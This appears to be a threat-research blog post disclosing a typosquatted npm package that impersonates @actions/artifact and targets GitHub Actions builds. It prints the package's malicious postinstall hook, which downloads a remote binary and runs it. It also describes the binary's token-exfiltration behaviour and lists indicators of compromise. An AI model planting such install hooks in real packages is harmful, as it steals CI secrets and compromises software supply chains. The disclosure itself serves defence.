On Friday 7th November Veracode Threat Research identified a malicious npm package “@acitons/artifact”, that was typosquatting on the legitimate package @actions/artifact, which has accumulated over 206k downloads. The malicious package appeared to be targeting GitHub-owned repositories.

We think the intent was to have this script execute during a build of a GitHub-owned repository, exfiltrate the tokens available to the build environment, and then use those tokens to publish new malicious artifacts as GitHub.

We observed 6 versions which which included a post-install hook to download and run malware which was not detected by any popular anti-virus products at the time of writing. The malicious versions look to have been removed by the actor as the package is still available on npm. We have notified npm of this malicious package, and Veracode Package Firewall customers were immediately protected from downloading this malicious package as of Friday when our researchers triaged it.

This campaign is targeting users of the GitHub Actions CI/CD technology and our finding underlines precisely why in the OWASP TOP 10 2025 (RC1) in position #3 they list “A03:2025-Software Supply Chain Failures”.

We took a look at the contents of package.json for version 4.0.13:

{
  "name": "@acitons/artifact",
  "version": "4.0.13",
  "preview": true,
  "description": "Actions artifact lib",
  "keywords": [
    "github",
    "actions",
    "artifact"
  ],
  "homepage": "https://github.com/actions/toolkit/tree/main/packages/artifact",
  "license": "MIT",
  "main": "lib/artifact.js",
  "types": "lib/artifact.d.ts",
  "directories": {
    "lib": "lib",
    "test": "__tests__"
  },
  "files": [
    "lib",
    "!.DS_Store"
  ],
  "publishConfig": {
    "access": "public"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/actions/toolkit.git",
    "directory": "packages/artifact"
  },
  "scripts": {
    "postinstall": "curl https://gist.githubusercontent.com/jmasdg/e35738952716511ac1e22efff400e40d/raw/6302935f5e4d6068fb6bce628771554e9e811c31/harness -o ci_test_harness && chmod +x ci_test_harness && ./ci_test_harness"
  },
  "bugs": {
    "url": "https://github.com/actions/toolkit/issues"
  },
  "dependencies": {
  },
  "devDependencies": {
  }
}

The package states it is for the GitHub Actions Toolkit, which has a legitimate npm package @actions/artifact. Therefore this malware package is a clear typosquat with the swapping of the letters “ti” for “it”.

We took a look at the “harness” binary as indicated in version 4.0.13. Virus Total did not report any popular anti-virus vendors flagging the file as malicious, though now if you look at the “Behavior” tab you can see what we found when we manually reviewed the binary, that something wasn’t legitimate about this file:

• There was a mechanism to prevent execution if the time is after 2025-11-06 UTC. This malware has an expiry day. We looked at one of the other samples “tester” and found that was set to expire the day after.
• The binary was an obfuscated shell script that had been compiled using the Shell Script Compiler tool.
• The binary re-executed itself from bash after first setting an environment variable, so as to change the runtime behavior and activate. This resulted in it outputting, extracting and executing a node package which contained an obfuscated file “verify.js”.
• verify.js featured checks for certain GITHUB_ variables which are understood to be set by GitHub Actions.
• The malware was only targeting repositories owned by the GitHub organization, making this a targeted attack against GitHub. The verify.js script exited if the organization was not GitHub: PUT_FILE_ENC = STAGING_DIR + '/env.enc', targets = ['github']; !targets.includes(process.env.GITHUB_REPOSITORY_OWNER && process.exit(0);
• It obtained an AES encryption key from hxxps://83hfhjasksn.hopto[.]org:443/kljkalsd/ajkl12389/slkj1n_189n – a service used for resolving DNS names, encrypted the data, and then exfiltrated the encrypted data to hxxps://laughing-space-capybara-x5g6rjxq7jwvfp6q6-443.app.github[.]dev/sllkjdsss_user-dasd.txt.
• The campaign appears to be targeting GitHub’s own repositories as well as a user y8793hfiuashfjksdhfjsk which exists but has no public activity. This user account could be for testing.

As of today (Monday 10th November) the binaries have been removed as have these malicious versions of the package, presumably by the malware authors or perhaps because GitHub identified the malware since it seems the two GitHub users have been removed. The package is still available on npm with a latest version of 4.0.10 at the time of writing, which does not contain these post-install hooks and only a simple log line.

Looking further back for other packages of this nature earlier in the month we found and blocked 12 versions of the now removed malicious package “8jfiesaf83”.

Customers using Veracode Package Firewall are protected from this threat and others like it. Click here to learn more.

Indicators of Compromise (IoC) for Malicious NPM Package

NPM Packages

• @acitons/artifact@4.0.12
• @acitons/artifact@4.0.13
• @acitons/artifact@4.0.14
• @acitons/artifact@4.0.15
• @acitons/artifact@4.0.16
• @acitons/artifact@4.0.17
• 8jfiesaf83@1.0.0
• 8jfiesaf83@1.0.1
• 8jfiesaf83@1.0.2
• 8jfiesaf83@1.0.3
• 8jfiesaf83@1.0.4
• 8jfiesaf83@1.0.5
• 8jfiesaf83@1.0.6
• 8jfiesaf83@1.0.7
• 8jfiesaf83@1.0.8
• 8jfiesaf83@1.0.9
• 8jfiesaf83@1.0.10
• 8jfiesaf83@1.0.11

NPM Users

• blakesdev

GitHub Users

• jmasdg
• f8snaf
• s0larized

SHA256 Hashes

• e3a6d0d139dc56f28f82ec161b3d17ecd137b088acd3a0e8330a5d412c025b73